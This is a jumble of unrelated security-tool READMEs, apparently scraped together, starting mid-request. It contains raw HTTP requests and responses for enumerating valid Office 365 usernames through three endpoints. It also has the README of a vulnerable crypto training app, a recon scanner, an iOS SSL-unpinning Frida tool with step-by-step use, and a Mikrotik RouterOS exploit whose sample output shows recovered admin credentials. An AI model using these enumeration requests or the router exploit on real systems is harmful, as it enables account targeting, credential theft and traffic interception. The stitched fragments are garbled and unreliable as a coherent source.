MS-ASProtocolVersion: 14.0
Content-Length: 2
Authorization: Basic aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ==

This elicits the following response ("401 Unauthorized" but this time without the X-MailboxGuid header, indicating the username is invalid.

HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 2944dbfc-8a1e-4759-a8a2-e4568950601d
X-CalculatedFETarget: DB3PR0102CU001.internal.outlook.com
X-BackEndHttpStatus: 401
WWW-Authenticate: Basic Realm="",Negotiate
X-FEProxyInfo: DB3PR0102CA0017.EURPRD01.PROD.EXCHANGELABS.COM
X-CalculatedBETarget: DB7PR04MB5452.eurprd04.prod.outlook.com
X-BackEndHttpStatus: 401
X-RUM-Validated: 1
X-DiagInfo: DB7PR04MB5452
X-BEServer: DB7PR04MB5452
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 401
X-FEServer: DB3PR0102CA0017
X-Powered-By: ASP.NET
X-FEServer: AM0PR04CA0024
Date: Fri, 31 Jan 2020 16:19:11 GMT
Connection: close

--snip--

The autodiscover endpoint allows for user enumeration without an authentication attempt. The endpoint returns a 200 status code if the user exists and a 302 if the user does not exists (unless the redirection is made to an on-premise Exchange server).

GET /autodiscover/autodiscover.json/v1.0/existing@contoso.com?Protocol=Autodiscoverv1 HTTP/1.1
Host: outlook.office365.com
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
MS-ASProtocolVersion: 14.0

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 97
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
request-id: fee7f899-7115-43da-9d34-d3ee19920a89
X-CalculatedBETarget: AM0PR09MB2882.eurprd09.prod.outlook.com
X-BackEndHttpStatus: 200
X-RUM-Validated: 1
X-AspNet-Version: 4.0.30319
X-DiagInfo: AM0PR09MB2882
X-BEServer: AM0PR09MB2882
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 200
X-Powered-By: ASP.NET
X-FEServer: AM0PR0202CA0008
Date: Mon, 02 Mar 2020 12:50:48 GMT
Connection: close

{"Protocol":"Autodiscoverv1","Url":"https://outlook.office365.com/autodiscover/autodiscover.xml"}

GET /autodiscover/autodiscover.json/v1.0/nonexistent@contoso.com?Protocol=Autodiscoverv1 HTTP/1.1
Host: outlook.office365.com
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
MS-ASProtocolVersion: 14.0

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 277
Content-Type: text/html; charset=utf-8
Location: https://outlook.office365.com/autodiscover/autodiscover.json?Email=nonexistent%40contoso.com&Protocol=Autodiscoverv1&RedirectCount=1
Server: Microsoft-IIS/10.0
request-id: 1c50adeb-53ac-41b9-9c34-7045cffbae45
X-CalculatedBETarget: DB6PR0202MB2568.eurprd02.prod.outlook.com
X-BackEndHttpStatus: 302
X-RUM-Validated: 1
X-AspNet-Version: 4.0.30319
X-DiagInfo: DB6PR0202MB2568
X-BEServer: DB6PR0202MB2568
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 302
X-Powered-By: ASP.NET
X-FEServer: AM0PR0202CA0013
Date: Mon, 02 Mar 2020 12:50:50 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://outlook.office365.com/autodiscover/autodiscover.json?Email=nonexistent%40contoso   .com&amp;Protocol=Autodiscoverv1&amp;RedirectCount=1">here</a>.</h2>
</body></html>

WARNING: This method only works for organization that are subscribers of Exchange Online and that do not have on-premise or hybrid deployment of Exchange server.

For companies that use on premise Exchange servers or some hybrid deployment and based on some configuration I haven't identified yet, the server might return a value indicating the username exists for any username value.

The method is useful when you don't want to burn an authentication attempt with 'Password1' :)

When the account does not exist, IfExistsResult is set to 0.

POST /common/GetCredentialType?mkt=en-US HTTP/1.1
Host: login.microsoftonline.com
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: application/json
Connection: close
client-request-id: 4345a7b9-9a63-4910-a426-35363201d503
hpgrequestid: 23975ac9-f51c-443a-8318-db006fd83100
Referer: https://login.microsoftonline.com/common/oauth2/authorize
canary: --snip--
hpgact: 1800
hpgid: 1104
Origin: https://login.microsoftonline.com
Cookie: --snip--
Content-Length: 1255
Content-Type: application/json

{
    "checkPhones": false,
    "isOtherIdpSupported": true,
    "isRemoteNGCSupported": true,
    "federationFlags": 0,
    "isCookieBannerShown": false,
    "isRemoteConnectSupported": false,
    "isSignup": false,
    "originalRequest": "rQIIA--snip--YWSO2",
    "isAccessPassSup   ported": true,
    "isFidoSupported": false,
    "isExternalFederationDisallowed": false,
    "username": "existing@contoso.com",
    "forceotclogin": false
}

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
client-request-id: 177110da-7ce4-4880-b856-be6326078046
x-ms-request-id: c708b83f-4167-4b4c-a1db-d2011ecb3200
x-ms-ests-server: 2.1.9966.8 - AMS2 ProdSlices
Referrer-Policy: strict-origin-when-cross-origin
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: fpc=ArU-Dva0f59Eg4t_V3VsX_TsYIXWAQAAAFRGxtUOAAAA; expires=Sun, 01-Mar-2020 16:01:26 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: x-ms-gateway-slice=prod; path=/; SameSite=None; secure; HttpOnly
Set-Cookie: stsservicecookie=ests; path=/; secure; HttpOnly; SameSite=None
Date: Fri, 31 Jan 2020 16:01:26 GMT
Connection: close
Content-Length: 587

{
    "Username":"existing@contoso.com",
    "Display":"existing@cont   oso.com",
    "IfExistsResult":0,
    "ThrottleStatus":0,
    "Credentials":{
        "PrefCredential":1,
        "HasPassword":true,
        "RemoteNgcParams":null,
        "FidoParams":null,
        "SasParams":null
    },
    "EstsProperties":{
        "UserTenantBranding":null,
        "DomainType":3
    },
    "IsSignupDisallowed":true,
    "apiCanary":"--snip--"
}

When the account does not exist, IfExistsResult is set to 1.

POST /common/GetCredentialType?mkt=en-US HTTP/1.1
Host: login.microsoftonline.com
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: application/json
Connection: close
client-request-id: 4345a7b9-9a63-4910-a426-35363201d503
hpgrequestid: 23975ac9-f51c-443a-8318-db006fd83100
Referer: https://login.microsoftonline.com/common/oauth2/authorize
canary: --snip--
hpgact: 1800
hpgid: 1104
Origin: https://login.microsoftonline.com
Cookie: --snip--
Content-Length: 1255
Content-Type: application/json

{
    "checkPhones": false,
    "isOtherIdpSupported": true,
    "isRemoteNGCSupported": true,
    "federationFlags": 0,
    "isCookieBannerShown": false,
    "isRemoteConnectSupported": false,
    "isSignup": false,
    "originalRequest": "rQIIA--snip--YWSO2",
    "isAccessPassSup   ported": true,
    "isFidoSupported": false,
    "isExternalFederationDisallowed": false,
    "username": "nonexistent@contoso.com",
    "forceotclogin": false
}

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
client-request-id: 95bba645-c3b0-4566-b0f4-237bd3df2ca7
x-ms-request-id: fea01b74-7a60-4142-a54d-7aa8f6471c00
x-ms-ests-server: 2.1.9987.14 - WEULR2 ProdSlices
Referrer-Policy: strict-origin-when-cross-origin
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: fpc=Ai0TKYuyz3BCp7OL29pUnG7sYIXWAQAAABsDztUOAAAA; expires=Sat, 07-Mar-2020 12:57:44 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: x-ms-gateway-slice=estsfd; path=/; SameSite=None; secure; HttpOnly
Set-Cookie: stsservicecookie=ests; path=/; secure; HttpOnly; SameSite=None
Date: Thu, 06 Feb 2020 12:57:43 GMT
Connection: close
Content-Length: 579


{
    "ThrottleStatus": 0,
    "apiCanary": "--snip--",
    "Username": "nonexistent@contoso.com",
    "IfExistsResult": 1,
    "EstsProperties": {
        "UserTenantBranding": null,
        "DomainType": 3
    },
    "Credentials": {
        "PrefCredential": 1,
        "FidoParams": null,
        "RemoteNgcParams": null,
        "SasParams": null,
        "HasPassword": true
    },
    "IsSignupDisallowed": true,
    "Display": "nonexistent@contoso.com"
}

• @jenic - Arguments parsing and false negative reduction.

If you try to learn a little bit more about crypto, either because you want to know how the attacks work or just because you want to do safe code, you end up diving really fast into the math behind the algorithms, and for a lot of people this is a NO.

This project was created with some key points in mind:

• Real world examples of the crypto attack vectors
• No need to write code to exploit a vulnerability that you are still trying to understand
• No challenge without a solution
• Dead simple documentation. No complex math, no complex formulas. Good old english
• A common place to test different attack vectors
• Make easy for everyone to understand crypto, attacks and preventions.
• Go straight to the point, the challenges are no brain teasers, just a scenario with a crypto vuln.

(Make sure you have node installed)

npm run build-with-deps

Or if you already have the dependencies installed you can just run:

npm run build

If you cloned the repo and are having issues in the test phase, it may be due to the line endings. Force linux like line endings in git with:

Change git config to use LF intead of CRLF

git config --global core.eol lf
git config --global core.autocrlf input

npm run start

You can change the port with an environment variable:

PORT=4000 npm run start

You can download the latest docker image with:

docker pull damnvulnerablecryptoapp1/damnvulnerablecryptoapp

If you prefer to build the docker image yourself run:

npm build:docker

By default port 8081 is being exported, So you can map it to your own port:

docker run -p 8081:8081 <IMAGE_ID>

If you want to to develop new features, or just run without building the app you can start by installing dependencies with:

npm run install-deps

Then you need to run independently the frontend and the backend apps.

cd backend 
yarn start

If you want to change the default port (1234), you can use an environment variable:

PORT=5000 yarn start

cd frontend
yarn start

if you want to change the frontend port (default is 4000) you can set an environment variable:

PORT=3000 yarn start

If you changed the server port you need to specify it when booting the frontend, again, as an environment variable:

REACT_APP_SERVER_PORT=5000 yarn start

You can find project's documentation on github wiki

• Crypton
• RSACtfTool
• CryptoHack
• Cryptopals
• MysteryTwister C3

DamnVulnerableCryptoApp is MIT licensed

Nuubi Tools: Information-ghatering|Scanner|Recon

Options:    
      -h/--help       |  Show help message and exit

Arguments: 

        -b/--banner    | Banner grabing of target ip address
        -s/--subnet    | Subnetlookup of target       
        -c/--cms       | Cms detect with headers
        -d/--dns       | Dnslookup of target domain
        -e/--extract   | Extract links from target url(https/http)
        -H/--http      | Httpheaders of target url
        -n/--nmap      | Nmapscan of target domain
        -S/--sub       | Subdomain lookup of target domain
        -f/--find      | Find hosts sharing DNS servers
        -u/--username  | Github username of target
        -w/--whois     | Whois of target domain
        -C/--crawl     | Crawler target url
        -r/--reverse   | Reverse ip lookup
        -z/--zone      | zonetransfer, Retrieve DNS Zone

        --asn          | Check an Autonomous System Number (ASN)
           --nping        | nping, test Ping Response
        --cookie       | Cloudflare cookie scraper
        --revdns       | Reverse DNS
        --cert         | Certificate Transparency log monitor
        --url          | URL and website scanner for potentially malicious websites
        --response     | Check code status response
        --exj          | Extract GET parameters from javascript files

        -ip            | GeoIP lookup of target ip address 
        -T             | Traceroute

python3 nuub.py "arguments" example.site

• Infromation Modules :
• Banner grabing
• Subnetlookup
• Cms detect
• Certificate Transparency log monitor
• Dnslookup
• Extract links
• GeoIP lookup
• Httpheaders
• Nmapscan
• Subdomain lookup
• Traceroute
• Find hosts sharing DNS servers
• URL and website scanner for potentially malicious websites
• Github username
• Whois
• Crawler
• Reverse ip
• Reverse DNS
• Zonetransfer
• Nping test Ping Response
• Check an Autonomous System Number (ASN)
• Cloudflare Cookie Scraper
• Check code status response

INFO: NUUBI is a Recon Tools, Scanners and tools for penetration testing.Reconnaissance is the first phase of penetration       
testing which means gathering information before any real attacks are planned So NUUBI is an Incredible fast recon tool for 
penetration tester which is specially designed for Reconnaissance phase.

root@kali~# git clone https://github.com/pikpikcu/nuubi.git

root@kali~# pip install -r requirements.txt

root@kali~# python3 nuub.py -h

pikpik~$ pkg install python git ncurses-bin -y

pikpik~$ git clone https://github.com/pikpikcu/nuubi.git | cd nuubi

pikpik~$ pip install -r requirements.txt

pikpik~$ python3 nuub.py -h

• dxdragon
• Hackertarget
• Github

"MEDUZA" ("медуза") means "jellyfish" in Ukrainian

It's a Frida-based tool, my replacement for SSLKillSwitch. I created it for in-house use, but then decided to opensource it. TBH, I hate open source, but the world is full of compromises... :(

It's simple. First time, you run an app without sniffing and use it as usual. MEDUZA is sitting quietly and collecting certificates used by the app to connect servers. Then MEDUZA generates a Frida script that fakes (==upnin) the collected certificates. So you run the app for second time, use the generated script, and catch the traffic with mitmproxy.

MEDUZA can only unpin apps using iOS system SSL libs. Some apps (e.g. Instagram) do not use the system SSL libs, they implement some third-party custom SSL stack (for example, Instagram uses OpenSSL statically linked to an Instagram private frameworks, see InstagramSSLPinningBypass-iOS for details).

Also, MEDUZA is based on Frida, so it does not work on apps with anti-Frida protection.

I didn't test it, but MEDUZA employs a different approach than SSLKillSwitch and similar tools, so, theoretically, they should work together without problems. Again, I didn't test it, so I'm not 100% sure.

• A Mac with MacOS Mojave or later (maybe MEDUZA works on Windows and Linux as well, but it was not tested)

• A jailbroken iOS device (MEDUZA was tested on iPhone SE 2016 with iOS 13.3 and iPhone 6s with iOS 14.0, both are jailbroken with checkra1n; theoretically, MEDUZA should work with other devices as well, but it was not tested)

• The latest Frida installed on the Mac and the iOS device.

• Mitmproxy installed on the Mac (MEDUZA was not tested with other sniffers like Charles proxy, I'm not sure it will work)

• The Mac and iOS device should be connected with a USB data cable and connected to the same WiFi network.

• Python 3 with cryptography on the Mac (just pip install cryptography)

There are two general steps. You need the first step to catch all certificates pinned by an app and generate a script to fake (==unpin) them. You should do it just once at the very beginning, then you can just use the generated script to sniff the traffic. The instruction for the first step:

1. Open Terminal on your Mac and run MEDUZA to list the installed/running apps on your iOS device:

   $ python3 meduza.py -l
   

   The output should look like

   MEDUZA iOS SSL unpinning tool
   by Dima Kovalenko (@kov4l3nko)
   ============================================================
   
   [*] Waiting for an iOS device connected to USB...
   [*] A list of installed applications:
   	+ Uber (com.ubercab.UberClient) is running, pid=40663
   	- Home (com.apple.Home)
   	- Files (com.apple.DocumentsApp)
   	- Podcasts (com.apple.podcasts)
   	- Contacts (com.apple.MobileAddressBook)
   	- Music (com.apple.Music)
   	- Photos (com.apple.mobileslideshow)
   	- TV (com.apple.tv)
   	+ App Store (com.apple.AppStore) is running, pid=40627
   	- Clock (com.apple.mobiletimer)
   	+ Settings (com.apple.Preferences) is running, pid=40619
   	- TikTok (com.zhiliaoapp.musically)
   	- Watch (com.apple.Bridge)
   	- FaceTime (com.apple.facetime)
   	- Maps (com.apple.Maps)
   	- Voice Memos (com.apple.VoiceMemos)
   <...etc, you'll see remaining apps here...>
   

2. Important! Make sure your iOS device WiFi settings are "clear", e.g. no proxy and/or custom router IP specified. On the first step, we do not try to sniff the traffic, so the WiFi network connection should be "as usual".

3. Choose the app, e.g. Uber. Run MEDUZA as follows

   $ python3 meduza.py -s <app name of id> <path/to/the/frida/script.js>
   

   e.g. for Uber

   $ python3 meduza.py -s com.ubercab.UberClient ./unpinUber.js
   

   Here -s means that Uber will be (re-)spawned. If you wanna connect to an already running app and do not re-spawn it, use -a instead of -s.

   As result, you should see something like

   MEDUZA iOS SSL unpinning tool
   by Dima Kovalenko (@kov4l3nko)
   ============================================================
   
   [*] Waiting for an iOS device connected to USB...
   [*] Spawning com.ubercab.UberClient...
   [*] Attaching to com.ubercab.UberClient...
   [*] Reading JS payload meduza.js...
   [*] Injecting JS payload to the process...
   [*] SecCertificateCreateWithBytes(...) hooked!
   [*] Resuming the application...
   [*] Press ENTER to complete (you can do it anytime)...
   [*] Got another certificate, its raw SHA256 hash: 99b05557bafde776f0afc15bbf6733585b8a03606cbf757158fb96324e01310a
   	crashlytics.com
   	reports.crashlytics.com
   	firebase-settings.crashlytics.com
   	apps-ios.crashlytics.com
   	android-sdk.crashlytics.com
   	api.crashlytics.com
   	settings-api.crashlytics.com
   	download.crashlytics.com
   	distribution-uploads.crashlytics.com
   	cm-us-east-1.crashlytics.com
   	www.crashlytics.com
   	try.crash   lytics.com
   	kits.crashlytics.com
   	cm.crashlytics.com
   	apps.crashlytics.com
   	cm-ap-southeast.crashlytics.com
   	settings.crashlytics.com
   	e.crashlytics.com
   [*] Got another certificate, its raw SHA256 hash: 954a9f7dd9f03784bdc5ca9183484a5bfc278ca9ba9f42b3a82f96cffddf277b
   [*] Got another certificate, its raw SHA256 hash: 649a4665273e60b353fe9b4db1807d9669f82cb0ee85bd1e562e7c2f33fdec3a
   	*.cfe.uber.com
   	cfe.uber.com
   	cn-dca1.cfe.uber.com
   [*] Got another certificate, its raw SHA256 hash: eae72eb454bf6c3977ebd289e970b2f5282949190093d0d26f98d0f0d6a9cf17
   <...etc, you can see many messages about certificates, it's ok...>
   

4. Do something typical in the app: login, tap some buttons, logoff... e.g. act like an ordinary dumb user :) Every time the app uses a (pinned or not pinned) certificate to connect a server, MEDUZA catches and remembers the certificate.

5. As soon as you complete your monkey-tapping, press ENTER in the Terminal. MEDUZA will generate a script (e.g. ./unpinUber.js in the example above).

The first step is completed. The second step is to use the script:

1. Run ifconfig | grep "inet " in your Mac Terminal to see your Mac's IP address.

2. Run Mitmproxy on your Mac

3. On your iOS device, set the Mac's IP and mitmproxy port (8080 by default) as a proxy for the WiFi connection.

4. Run the generated script with the app. E.g. to (re-)spawn and unpin Uber app, run in Mac Terminal

   $ frida -U -f com.ubercab.UberClient --no-pause -l ./unpinUber.js
   

   See Frida documentation for other options (e.g. to connect already running application).

There are many ways to do it, e.g.

1. Instagram uses a statically-linked fork of OpenSSL instead of iOS system libs to implement SSL stack. That is why MEDUZA doesn't work on Instagram.

2. You can add some anti-Frida protection to your app. MEDUZA is based on Frida: if Frida fails, MEDUZA fails as well.

Try to fix it yourself or create an issue. However, I take a look at this GitHub account from time to time ( ==once a year) and support MEDUZA in my spare time ( ==never), so I can't guarantee any support. Welcome to the opensource world ;(

mikrot8over: Fast exploitation tool for Mikrotik RouterOS up to 6.38.4

This is reworked original Mikrotik Exploit. Added Python 2 compatibility and multithreading scan features.

Utility was tested on a python2.6, python2.7, python3.* If you have found any bugs, don't hesitate to open issue

pip install mikrot8over

# pip install mikrot8over
# mikrot8over 127.0.0.1
Starting scan for IP 127.0.0.1, port 8291 running in 10 threads
100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████&#   9608;████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 3379.78it/s]
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+
|          IP          |             Login              |                                               Password                                               |
+======================+================================+=============================================================   =========================================+
       127.0.0.1                    admin                                                              admin
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+

You can set max threads and socket timeout for large networks scan

# pip install mikrot8over
# mikrot8over --help
Usage:
        Mikrotik exploit from Vault 7 CIA Leaks automation tool
        Takeovers up to RouterOS 6.38.4.

        Usage: mikrot8over IP_ADDRESS


Options:
  -h, --help            show this help message and exit
  -p PORT, --port=PORT  List of the port to scan. Default is 8291
  -t THREADS, --threads=THREADS
                        Number of scan threads. Default is 10 that fits the
                        most of systems
  -o TIMEOUT, --timeout=TIMEOUT
Socket connection timeout```

• Yet available for Linux only ...
• Supports WordList Mode only but will surely get an Update with BruteForce Mode

Mail Swipe is a python script that helps you to create temporary email addresses and receive emails at that address. It uses the API provided by 1secmail to create emails addresses and fetch emails.

You can either generate your own email address or you can generate a random email address using this script. Once you receive an email it will be save in a text file inside the "All Mails" folder.

For security reason you cannot read messages from addresses: abuse@domain, webmaster@domain, contact@domain, postmaster@domain, hostmaster@domain, admin@domain. All other addresses are free to use. - 1secmail team -

# clone the repo
$ git clone https://github.com/sameera-madushan/Mail-Swipe.git

# change the working directory to Mail-Swipe
$ cd Mail-Swipe

# install the requirements
$ pip3 install -r requirements.txt

python mailSwipe.py

This script is inspired by sdushantha'stmpmail script.

Special thanks to Sandakelum Priyamantha.

Special thanks to devolopers of 1secmail API.